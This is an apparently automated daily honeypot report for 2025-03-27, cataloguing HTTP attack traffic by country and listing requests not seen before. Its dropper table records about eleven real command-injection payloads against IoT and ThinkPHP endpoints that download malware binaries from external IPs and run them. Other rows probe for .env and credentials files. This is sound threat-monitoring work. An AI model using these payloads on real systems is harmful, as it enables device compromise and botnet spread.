Daily Report: 2025-03-27#
Interaction report on http service of various honeypot around the world.
ot_simplified_report#
Simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.
| source_country | targeted_country |
|---|---|
| FR | Singapore |
| US | Dubai |
| CN | Georgia |
| DE |
botnet_dropper_behaviour#
List of requests suspected of having stage 1 dropper behavior (programs designed to extract other files from their own code)
| remote_addr | request |
|---|---|
| 175.107.1.221 | 27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0 |
| 117.72.77.99 | GET /shell?cd+/tmp;rm+-rf+*;wget+ 129.159.107.197/jaws;sh+/tmp/jaws HTTP/1.1 |
| 87.121.84.41 | POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20-rf%20parm7%3B%20wget%20http%3A%2F%2F193.32.162.27%2Fbins%2Fparm7%3B%20chmod%20777%20parm7%3B%20.%2Fparm7%20sex HTTP/1.1 |
| 31.170.22.205 | GET /cgi-bin/live_api.cgi?page=satellite_list&id=&ip=$(chmod+777+/tmp;rm+-rf+/tmp/*;cd+/tmp;wget+http://31.170.22.205/dl18;curl+-O+http://31.170.22.205/dl18;sh+dl18) HTTP/1.1 |
| 211.143.108.124 | GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1 |
| 185.191.127.222 | POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20arm7%3B%20wget%20http%3A%2F%2F45.87.43.37%2Farm7%3B%20chmod%20777%20%2A%3B%20.%2Farm7%20tbk HTTP/1.1 |
| 222.133.54.222 | GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘rm -rf bejv86; wget http://176.65.134.201/bejv86 -O /tmp/.Aqua; chmod 777 /tmp/.Aqua; /tmp/.Aqua thinkphp.selfrep’ HTTP/1.1 |
| 180.153.27.22 | GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1 |
| 61.130.11.82 | GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1 |
| 58.58.30.134 | GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1 |
| 84.195.192.75 | GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1 |
request#
List of requests of the day that have never been detected, other requests that have already been detected and archived in the request database.
| number_of_occurence | request | |
|---|---|---|
| 143 | 5 | GET /static/css/chunk-fffbd800.3e1a8b72.css HTTP/1.1 |
| 238 | 2 | POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=busybox%20reboot%20&&%20reboot HTTP/1.1 |
| 280 | 1 | GET /PbBh HTTP/1.1 |
| 285 | 1 | GET /ARVt HTTP/1.1 |
| 307 | 1 | \x00\x0E\x08\xB2\x1F\xE8\x07\xE0\xD8\xD0\xBE\x00\x00\x00\x00\x00 |
| 308 | 1 | \x00\x0E8\xB2\x1F\xE8\x07\xE0\xD8\xD0\xBE\x00\x00\x00\x00\x00 |
| 332 | 1 | GET /config.phpinfo HTTP/1.1 |
| 385 | 1 | \x00\x0E\x08v\xAELWH1{\xA6\x00\x00\x00\x00\x00 |
| 395 | 1 | \x00\x0E8v\xAELWH1{\xA6\x00\x00\x00\x00\x00 |
| 423 | 1 | POST /cgi-bin/cgi_main.cgi HTTP/1.1 |
| 446 | 1 | GET /socket.io/1/?t=1743038285763 HTTP/1.1 |
| 475 | 1 | GET /lib/.env HTTP/1.1 |
| 501 | 1 | GET /OdinHttpCall1743114175 HTTP/1.1 |
| 516 | 1 | PORT 81, HEAD /robots.txt HTTP/1.0 |
| 524 | 1 | GET /Nmap/folder/check1743111188 HTTP/1.1 |
| 525 | 1 | GET /NmapUpperCheck1743111188 HTTP/1.1 |
| 526 | 1 | GET /nmaplowercheck1743111188 HTTP/1.1 |
| 531 | 1 | GET /odinhttpcall1743050364 HTTP/1.1 |
| 548 | 1 | GET /Odin/http/call1743114175 HTTP/1.1 |
| 557 | 1 | GET /odinhttpcall1743114175 HTTP/1.1 |
| 558 | 1 | GET /OdinHttpCall1743050364 HTTP/1.1 |
| 561 | 1 | GET /stage/.env HTTP/1.1 |
| 567 | 1 | GET /Odin/http/call1743050364 HTTP/1.1 |
| 665 | 1 | GET /credentials HTTP/1.1 |
| 687 | 1 | GET /API/.env HTTP/1.1 |
| 695 | 1 | GET /skin/default_1/images/logo.png HTTP/1.1 |
| 697 | 1 | GET /image/lgbg.jpg HTTP/1.1 |
| 706 | 1 | GET /nobody/favicon.ico HTTP/1.1 |
| 711 | 1 | GET /Odin/http/call1743060215 HTTP/1.1 |
| 712 | 1 | GET /OdinHttpCall1743060215 HTTP/1.1 |
| 713 | 1 | GET /odinhttpcall1743060215 HTTP/1.1 |
| 716 | 1 | GET /infos/ HTTP/1.1 |
country_iso_code#
List of country names and number of requests received by IPs located in these countries
| number_of_occurence | country_iso_code | |
|---|---|---|
| 0 | 647 | NL |
| 1 | 475 | FR |
| 2 | 411 | US |
| 3 | 408 | BG |
| 4 | 231 | DE |
| 5 | 161 | GB |
| 6 | 161 | CN |
| 7 | 92 | HK |
| 8 | 82 | PL |
| 9 | 54 | SG |
| 10 | 50 | CH |
| 11 | 47 | VN |
| 12 | 35 | JP |
| 13 | 26 | SC |
| 14 | 25 | RU |
| 15 | 17 | IN |
| 16 | 13 | CA |
| 17 | 12 | GE |
| 18 | 11 | NG |
| 19 | 11 | AU |
| 20 | 10 | BE |
| 21 | 10 | GH |
| 22 | 9 | NO |
| 23 | 8 | ID |
| 24 | 7 | IR |
| 25 | 7 | AZ |
| 26 | 7 | LT |
| 27 | 7 | PT |
| 28 | 6 | TH |
| 29 | 6 | ZA |
| 30 | 5 | TR |
| 31 | 4 | BR |
| 32 | 3 | LV |
| 33 | 3 | UA |
| 34 | 3 | IE |
| 35 | 2 | RO |
| 36 | 2 | KR |
| 37 | 1 | BD |
| 38 | 1 | PH |
| 39 | 1 | PK |
| 40 | 1 | PE |
| 41 | 1 | MD |
| 42 | 1 | MC |
| 43 | 1 | AE |
| 44 | 1 | YE |
| 45 | 1 | IT |
| 46 | 1 | CO |